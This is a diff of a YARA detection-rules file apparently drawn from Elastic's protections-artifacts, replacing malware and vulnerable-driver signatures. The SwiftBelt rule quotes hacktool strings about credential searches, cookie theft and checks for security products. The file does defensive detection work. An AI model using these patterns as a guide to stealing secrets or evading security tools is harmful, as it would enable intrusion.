"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Cornelgen.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "24c0ba8ad4f543f9b0aff0d0b66537137bc78606b47ced9b6d08039bbae78d80" - logic_hash = "67c4f2d875f233b52fcbc24d9225c51af4dc09c27ce3915f0d756202bd4e5867" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L158-L176" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00e29303b66cb39a8bc23fe91379c087376ea26baa21f6b7f7817289ba89f655" + logic_hash = "a6a9d304d215302bf399c90ed0dd77a681796254c51a2a20e4a316dba43b387f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6b57eb6fd3c8e28cbff5e7cc51246de74ca7111a9cd1c795b21aa89142a693b4" + fingerprint = "f31c2658acd6d13ae000426d3845bcec7a8a587bbaed75173baa84b2871b0b42" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -60506,28 +61436,28 @@ rule ELASTIC_Linux_Exploit_Cornelgen_Be0Bc02D : FILE MEMORY os = "linux" strings: - $a = { 8B 44 24 08 A3 B8 9F 04 08 0F B7 05 04 A1 04 08 } + $a = { 6F C4 83 E0 01 83 E1 06 09 C1 44 89 E8 01 C9 D3 } condition: all of them } -rule ELASTIC_Linux_Exploit_Cornelgen_03Ee53D3 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_Af809Eea : FILE MEMORY { meta: - description = "Detects Linux Exploit Cornelgen (Linux.Exploit.Cornelgen)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "03ee53d3-4f03-4c5e-9187-45e0e33584b4" + id = "af809eea-fe42-4495-b7e5-c22b39102fcd" date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Cornelgen.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "711eafd09d4e5433be142d54db153993ee55b6c53779d8ec7e76ca534b4f81a5" - logic_hash = "e7d9c66621ad3c56f3bb8150c17b10495053d9485b2143750aeefd3c55ab7943" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L178-L196" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "00e29303b66cb39a8bc23fe91379c087376ea26baa21f6b7f7817289ba89f655" + logic_hash = "4ae4b119a3eecfdb47a88fe5a89a4f79ae96eecf5d08eef08997357de7e6538a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f2a8ecfffb0328c309a3a5db7e62fae56bf168806a1db961a57effdebba7645e" + fingerprint = "373d2f57aede0b41296011d12b59ac006f6cf0e2bd95163f518e6e252459411b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -60535,89 +61465,86 @@ rule ELASTIC_Linux_Exploit_Cornelgen_03Ee53D3 : FILE MEMORY os = "linux" strings: - $a = { C9 B0 27 CD 80 31 C0 B0 3D CD 80 31 C0 8D 5E 02 } + $a = { 83 E0 01 83 E1 06 09 C1 44 89 ?? 01 C9 D3 } condition: all of them } -rule ELASTIC_Macos_Trojan_Thiefquest_9130C0F3 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_9F6Ac00F : FILE MEMORY { meta: - description = "Detects Macos Trojan Thiefquest (MacOS.Trojan.Thiefquest)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "9130c0f3-5926-4153-87d8-85a591eed929" - date = "2021-09-30" - modified = "2021-10-25" + id = "9f6ac00f-1562-4be1-8b54-bf9a89672b0e" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Thiefquest.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bed3561210e44c290cd410adadcdc58462816a03c15d20b5be45d227cd7dca6b" - logic_hash = "20e9ea15a437a17c4ef68f2472186f6d1ab3118d5b392f84fcb2bd376ec3863a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L198-L216" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9cd58c1759056c0c5bbd78248b9192c4f8c568ed89894aff3724fdb2be44ca43" + logic_hash = "9fa8e7be5c35c9a649c42613d0d5d5cecff3d9c3e9a572e4be1ca661876748a5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "38916235c68a329eea6d41dbfba466367ecc9aad2b8ae324da682a9970ec4930" + fingerprint = "77b171a3099327a5edb59b8f1b17fb3f415ab7fd15beabcd3b53916cde206568" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a1 = "heck_if_targeted" ascii fullword - $a2 = "check_command" ascii fullword - $a3 = "askroot" ascii fullword - $a4 = "iv_rescue_data" ascii fullword + $a = { B8 31 75 00 00 83 E3 06 09 D9 01 C9 D3 F8 89 C1 } condition: all of them } -rule ELASTIC_Macos_Trojan_Thiefquest_Fc2E1271 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Xmrig_Dbcc9D87 : FILE MEMORY { meta: - description = "Detects Macos Trojan Thiefquest (MacOS.Trojan.Thiefquest)" + description = "Detects Linux Cryptominer Xmrig (Linux.Cryptominer.Xmrig)" author = "Elastic Security" - id = "fc2e1271-3c96-4c93-9e3d-212782928e6e" - date = "2021-10-05" - modified = "2021-10-25" + id = "dbcc9d87-5064-446d-9581-b14cf183ec3f" + date = "2021-12-13" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Thiefquest.yar#L24-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "12fb0eca3903a3b39ecc3c2aa6c04fe5faa1f43a3d271154d14731d1eb196923" - logic_hash = "a20c76e53874fc0fec5fd2660c63c6f1e7c1b2055cbd2a9efdfd114cd6bdda5c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Xmrig.yar#L218-L236" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "da9b8fb5c26e81fb3aed3b0bc95d855339fced303aae2af281daf0f1a873e585" + logic_hash = "b7fa60e32cb53484d8b76b13066eda1f2275ee2660ac2dc02b0078b921998e79" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "195e8f65e4ea722f0e1ba171f2ad4ded97d4bc97da38ef8ac8e54b8719e4c5ae" + fingerprint = "ebb6d184d7470437aace81d55ada5083e55c0de67e566b052245665aeda96d69" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 77 47 72 33 31 30 50 6D 72 7A 30 30 30 30 30 37 33 00 30 30 30 42 67 7B 30 30 } + $a = { 78 72 47 47 58 34 53 58 5F 34 74 43 41 66 30 5A 57 73 00 64 48 8B 0C 25 F8 FF } condition: all of them } -rule ELASTIC_Macos_Trojan_Thiefquest_86F9Ef0C : FILE MEMORY +rule ELASTIC_Macos_Hacktool_Swiftbelt_Bc62Ede6 : FILE MEMORY { meta: - description = "Detects Macos Trojan Thiefquest (MacOS.Trojan.Thiefquest)" + description = "Detects Macos Hacktool Swiftbelt (MacOS.Hacktool.Swiftbelt)" author = "Elastic Security" - id = "86f9ef0c-832e-4e4a-bd39-c80c1d064dbe" - date = "2021-10-05" + id = "bc62ede6-e6f1-4c9e-bff2-ef55a5d12ba1" + date = "2021-10-12" modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Thiefquest.yar#L44-L62" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "59fb018e338908eb69be72ab11837baebf8d96cdb289757f1f4977228e7640a0" - logic_hash = "426d533d39e594123f742b15d0a93ded986b9b308685f7b2cfaf5de0b32cdbff" + reference = "https://www.elastic.co/security-labs/inital-research-of-jokerspy" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Hacktool_Swiftbelt.yar#L1-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "452c832a17436f61ad5f32ee1c97db05575160105ed1dcd0d3c6db9fb5a9aea1" + logic_hash = "51481baa6ddb09cf8463d989637319cb26b23fef625cc1a44c96d438c77362ca" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "e8849628ee5449c461f1170c07b6d2ebf4f75d48136f26b52bee9bcf4e164d5b" + fingerprint = "98d14dba562ad68c8ecc00780ab7ee2ecbe912cd00603fff0eb887df1cd12fdb" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -60625,57 +61552,87 @@ rule ELASTIC_Macos_Trojan_Thiefquest_86F9Ef0C : FILE MEMORY os = "macos" strings: - $a = { 6C 65 31 6A 6F 57 4E 33 30 30 30 30 30 33 33 00 30 72 7A 41 43 47 33 57 72 7C } + $dbg1 = "SwiftBelt/Sources/SwiftBelt" + $dbg2 = "[-] Firefox places.sqlite database not found for user" + $dbg3 = "[-] No security products found" + $dbg4 = "SSH/AWS/gcloud Credentials Search:" + $dbg5 = "[-] Could not open the Slack Cookies database" + $sec1 = "[+] Malwarebytes A/V found on this host" + $sec2 = "[+] Cisco AMP for endpoints found" + $sec3 = "[+] SentinelOne agent running" + $sec4 = "[+] Crowdstrike Falcon agent found" + $sec5 = "[+] FireEye HX agent installed" + $sec6 = "[+] Little snitch firewall found" + $sec7 = "[+] ESET A/V installed" + $sec8 = "[+] Carbon Black OSX Sensor installed" + $sec9 = "/Library/Little Snitch" + $sec10 = "/Library/FireEye/xagt" + $sec11 = "/Library/CS/falcond" + $sec12 = "/Library/Logs/PaloAltoNetworks/GlobalProtect" + $sec13 = "/Library/Application Support/Malwarebytes" + $sec14 = "/usr/local/bin/osqueryi" + $sec15 = "/Library/Sophos Anti-Virus" + $sec16 = "/Library/Objective-See/Lulu" + $sec17 = "com.eset.remoteadministrator.agent" + $sec18 = "/Applications/CarbonBlack/CbOsxSensorService" + $sec19 = "/Applications/BlockBlock Helper.app" + $sec20 = "/Applications/KextViewr.app" condition: - all of them + 6 of them } -rule ELASTIC_Macos_Trojan_Thiefquest_40F9C1C3 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Iobitunlocker_Defb90Fd : FILE { meta: - description = "Detects Macos Trojan Thiefquest (MacOS.Trojan.Thiefquest)" + description = "Name: IObitUnlocker.sys, Version: 1.0.X.Y to 1.3.X.Y" author = "Elastic Security" - id = "40f9c1c3-29f8-4699-8f66-9b7ddb08f92d" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Thiefquest.yar#L64-L82" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e402063ca317867de71e8e3189de67988e2be28d5d773bbaf75618202e80f9f6" - logic_hash = "546edc2d6d715eac47e7a8d3ceb91cf314fa6dbee04f0475a5c4a84ba53fd722" + id = "defb90fd-d2ac-4168-b248-f698b590a63f" + date = "2023-07-25" + modified = "2023-07-25" + reference = "https://theevilbit.github.io/posts/iobit_unlocker_lpe/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0aff83f28d70f425539fee3d6a780210d0406264f8a4eb124e32b074e8ffd556" + hash = "5ce1a8eac73ef1d0741f34d9fb2661da322117a63bffe60ccad092da89664c42" + logic_hash = "4b0f440c66b7c9a193f0d6675c2a4246036ebc5c0c83856f45ec40a041e9cd07" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "27ec200781541d5b1abc96ffbb54c428b773bffa0744551bbacd605c745b6657" - severity = 100 + tags = "FILE" + fingerprint = "a2015ef9d0f3f5de47cd5c9a64953aef7a860d5cbd7e176df601c67c89294e4f" + threat_name = "Windows.VulnDriver.IoBitUnlocker" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 77 47 72 33 31 30 50 6D 72 7A 30 30 30 30 30 37 33 00 33 7C 49 56 7C 6A 30 30 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 [1-4] 49 00 4F 00 62 00 69 00 74 00 55 00 6E 00 6C 00 6F 00 63 00 6B 00 65 00 72 00 2E 00 73 00 79 00 73 } + $product_version = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 [1-4] 31 00 2E 00 ( 30 | 31 | 32 | 33 ) 00 } + $subject = { 06 03 55 04 0A [2] 49 4F 62 69 74 20 49 6E 66 6F 72 6D 61 74 69 6F 6E 20 54 65 63 68 6E 6F 6C 6F 67 79 } + $pdb_filename = "IObitUnlocker.pdb" fullword condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and (($original_file_name and $product_version) or ($subject and $pdb_filename)) } -rule ELASTIC_Macos_Trojan_Thiefquest_0F9Fe37C : FILE MEMORY +rule ELASTIC_Macos_Trojan_Sugarloader_E7E1D99C : FILE MEMORY { meta: - description = "Detects Macos Trojan Thiefquest (MacOS.Trojan.Thiefquest)" + description = "Identifies unpacked SugarLoader sample" author = "Elastic Security" - id = "0f9fe37c-77df-4d3d-be8a-c62ea0f6863c" - date = "2021-10-05" - modified = "2021-10-25" + id = "e7e1d99c-355e-4672-9176-d9eb5d2729c4" + date = "2023-10-24" + modified = "2023-10-24" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Thiefquest.yar#L84-L102" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "12fb0eca3903a3b39ecc3c2aa6c04fe5faa1f43a3d271154d14731d1eb196923" - logic_hash = "84f9e8938d7e2b0210003fc8334b8fa781a40afffeda8d2341970b84ed5d3b5a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_SugarLoader.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940" + logic_hash = "0689b704add81e8e7968d9dba5f60d45c8791209330f4ee97e218f8eeb22c88f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2e809d95981f0ff813947f3be22ab3d3c000a0d348131d5d6c8522447818196d" + fingerprint = "cfffdab1e603518df48719266f0a2e91763e5ae7c033d4bf7a4c37232aa8eb04" + threat_name = "MacOS.Trojan.SugarLoader" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -60683,256 +61640,274 @@ rule ELASTIC_Macos_Trojan_Thiefquest_0F9Fe37C : FILE MEMORY os = "macos" strings: - $a = { 77 47 72 33 31 30 50 6D 72 7A 30 30 30 30 30 37 33 00 33 71 6B 6E 6C 55 30 55 } + $seq_process_key = { 44 0F B6 0C 0F 89 C8 99 F7 BF ?? ?? ?? ?? 0F B6 84 17 ?? ?? ?? ?? 4C 21 C6 4C 01 CE 48 01 C6 } + $seq_handshake = { E8 ?? ?? ?? ?? 4C 8D 75 ?? 48 89 DF 4C 89 F6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 8B 06 C1 C0 ?? 44 21 F8 4C 8D 75 ?? 41 89 06 48 89 DF 4C 89 F6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? } + $seq_config = { 48 89 F7 48 C1 E7 05 48 29 F7 48 0F BE D1 48 01 FA 89 D6 8A 08 48 FF C0 84 C9 75 ?? EB ?? } + $seq_recieve_msg = { 45 85 FF 74 ?? 45 39 EF BA ?? ?? ?? ?? 41 0F 42 D7 41 8B 3C 24 48 89 DE 31 C9 E8 ?? ?? ?? ?? 41 29 C7 48 01 C3 48 85 C0 7F ?? B8 ?? ?? ?? ?? EB ?? } condition: - all of them + 3 of ($seq*) } -rule ELASTIC_Macos_Trojan_Thiefquest_1F4Bac78 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Dodgebox_095012D2 : FILE MEMORY { meta: - description = "Detects Macos Trojan Thiefquest (MacOS.Trojan.Thiefquest)" + description = "Detects Windows Trojan Dodgebox (Windows.Trojan.DodgeBox)" author = "Elastic Security" - id = "1f4bac78-ef2b-49cd-8852-e84d792f6e57" - date = "2021-10-05" - modified = "2021-10-25" + id = "095012d2-2804-44f5-b4a1-f9d9c028daf1" + date = "2024-07-11" + modified = "2024-07-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Thiefquest.yar#L104-L122" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "12fb0eca3903a3b39ecc3c2aa6c04fe5faa1f43a3d271154d14731d1eb196923" - logic_hash = "96db33e135138846f978026867bb2536226539997d060f41e7081f7f29b66c85" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DodgeBox.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c6a3a1ea84251aed908702a1f2a565496d583239c5f467f5dcd0cfc5bfb1a6db" + logic_hash = "f1fe9b05deaebaddd83dda0ad98602b49682f8ba767de8c0ffad761d344c5115" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e7d1e2009ff9b33d2d237068e2af41a8aa9bd44a446a2840c34955594f060120" + fingerprint = "0797dbe75dea90df77d35d2d4a259b4402c041bc10f9e52df2ef80b2a5804c9f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 77 47 72 33 31 30 50 6D 72 7A 30 30 30 30 30 37 33 00 32 33 4F 65 49 66 31 68 } + $a1 = { 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F 73 6F 66 74 5C 43 72 79 70 74 6F 67 72 61 70 68 79 00 4D 61 63 68 69 6E 65 47 75 69 64 00 2E 70 64 61 74 61 } + $a2 = { 5C 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 2E 00 4E 00 45 00 54 00 5C 00 61 00 73 00 73 00 65 00 6D 00 62 00 6C 00 79 00 5C 00 47 00 41 00 43 00 5F 00 4D 00 53 00 49 00 4C 00 5C 00 00 00 00 00 00 00 25 00 6C 00 6C 00 64 00 2E 00 6C 00 6F 00 67 } + $a3 = { 48 83 EC 20 48 63 51 3C 48 8B D9 33 F6 48 8D 3C 11 8B 8F 90 00 00 00 85 C9 74 21 8B 87 94 00 00 00 85 C0 74 17 44 8B C0 48 03 CB 33 D2 ?? ?? ?? ?? ?? 48 89 B7 90 00 00 00 8B 53 3C 48 63 FA } + $a4 = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 63 51 3C 48 8B D9 33 F6 48 8D 3C 11 8B 8F 90 00 } + $a5 = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 63 59 3C 33 D2 4C 8B C3 48 8B F1 E8 } condition: - all of them + any of them } -rule ELASTIC_Linux_Rootkit_Adore_Fe3Fd09F : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Echodrv_D17Ff31C : FILE { meta: - description = "Detects Linux Rootkit Adore (Linux.Rootkit.Adore)" + description = "Detects Windows Vulndriver Echodrv (Windows.VulnDriver.EchoDrv)" author = "Elastic Security" - id = "fe3fd09f-d170-4bb0-bc8d-6d61bdc22164" - date = "2021-04-06" - modified = "2021-09-16" + id = "d17ff31c-59d1-4bea-be25-c6f7fe2b8c7b" + date = "2023-10-31" + modified = "2023-11-03" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Rootkit_Adore.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f4e532b840e279daf3d206e9214a1b065f97deb7c1487a34ac5cbd7cbbf33e1a" - logic_hash = "cc07efb9484562cd870649a38126f08aa4e99ed5ad4662ece0488d9ffd97520e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_EchoDrv.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ea3c5569405ed02ec24298534a983bcb5de113c18bc3fd01a4dd0b5839cd17b9" + logic_hash = "0b2eb3c5da8703749ee63662495d6e8738ccdc353f3ac3df48e25a77312c0da0" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "2bab2a4391359c6a7148417b010887d0754b91ac99820258e849e81f7752069f" + tags = "FILE" + fingerprint = "dcf828c8db88580faeaa78f4bcda5a01ff4e710cb3e1e0912a99665831a070b4" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 C0 89 45 F4 83 7D F4 00 75 17 68 E4 A1 04 08 } + $str1 = "D:\\WACATACC\\Projects\\Programs\\Echo\\x64\\Release\\echo-driver.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $str1 } -rule ELASTIC_Linux_Exploit_Moogrey_81131B66 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Makop_3Ac2C13C : FILE MEMORY { meta: - description = "Detects Linux Exploit Moogrey (Linux.Exploit.Moogrey)" + description = "Detects Windows Ransomware Makop (Windows.Ransomware.Makop)" author = "Elastic Security" - id = "81131b66-788e-4456-9cb4-ffade713e8d4" - date = "2021-04-06" - modified = "2021-09-16" + id = "3ac2c13c-45f0-4108-81fb-e57c3cc0e622" + date = "2021-08-05" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Moogrey.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cc27b9755bd9feb1fb2c510f66e36c20a1503e6769cdaeee2bea7fe962d22ccc" - logic_hash = "dc2fe7caa38f665d24bbc673ff63491ebdeec8d56a420092243ce241238846cf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Makop.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "854226fc4f5388d40cd9e7312797dd63739444d69a67e4126ef60817fa6972ad" + logic_hash = "3fa7c506010a87ac97f415db32c21af091dff26fd912a8f9f5bb5e8d43a8da9e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d21e48c7afe580a764153ca489c24a7039ae663ebb281a4605f3a230a963e33e" + fingerprint = "4658a5b34ecb2a7432b7ab48041cc064d917b88a4673f21aa6c3c44b115c9b8c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 C0 89 45 D4 83 7D D4 00 79 1A 83 EC 0C 68 50 } + $a1 = { 20 00 75 15 8B 44 24 10 8B 4C 24 08 8B 54 24 0C 89 46 20 89 } condition: all of them } -rule ELASTIC_Macos_Virus_Vsearch_0Dd3Ec6F : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Makop_3E388338 : FILE MEMORY { meta: - description = "Detects Macos Virus Vsearch (MacOS.Virus.Vsearch)" + description = "Detects Windows Ransomware Makop (Windows.Ransomware.Makop)" author = "Elastic Security" - id = "0dd3ec6f-815f-40e1-bd53-495e0eae8196" - date = "2021-10-05" - modified = "2021-10-25" + id = "3e388338-83c7-453c-b865-13f3bd059515" + date = "2021-08-05" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Virus_Vsearch.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "17a467b000117ea6c39fbd40b502ac9c7d59a97408c2cdfb09c65b2bb09924e5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Makop.yar#L21-L44" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "854226fc4f5388d40cd9e7312797dd63739444d69a67e4126ef60817fa6972ad" + logic_hash = "5a6e5fd725f3d042c0c95b42ad00c93965a49aa6bda6ec5383a239f18d74742e" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "8adbd06894e81dc09e46d8257d4e5fcd99e714f54ffb36d5a8d6268ea25d0bd6" + fingerprint = "7920469120a69fed191c5068739ed922dcf67aa26d68e44708a1d63dc0931bc3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = { 2F 00 56 53 44 6F 77 6E 6C 6F 61 64 65 72 2E 6D 00 2F 4D 61 63 69 6E 74 6F 73 } + $a1 = "MPR.dll" ascii fullword + $a2 = "\"%s\" n%u" wide fullword + $a3 = "\\\\.\\%c:" wide fullword + $a4 = "%s\\%s\\%s" wide fullword + $a5 = "%s\\%s" wide fullword + $a6 = "Start folder" wide fullword condition: all of them } -rule ELASTIC_Macos_Virus_Vsearch_2A0419F8 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Windivert_25991186 : FILE MEMORY { meta: - description = "Detects Macos Virus Vsearch (MacOS.Virus.Vsearch)" + description = "Detects Windows Vulndriver Windivert (Windows.VulnDriver.WinDivert)" author = "Elastic Security" - id = "2a0419f8-95b2-4f87-a37a-ee0b65e344e9" - date = "2021-10-05" - modified = "2021-10-25" + id = "25991186-7a44-446c-9e97-e91bb9adfd77" + date = "2024-06-20" + modified = "2024-07-02" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Virus_Vsearch.yar#L20-L37" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fa9b811465e435bff5bc0f149ff65f57932c94f548a5ece4ec54ba775cdbb55a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_WinDivert.yar#L1-L19" + license_url = 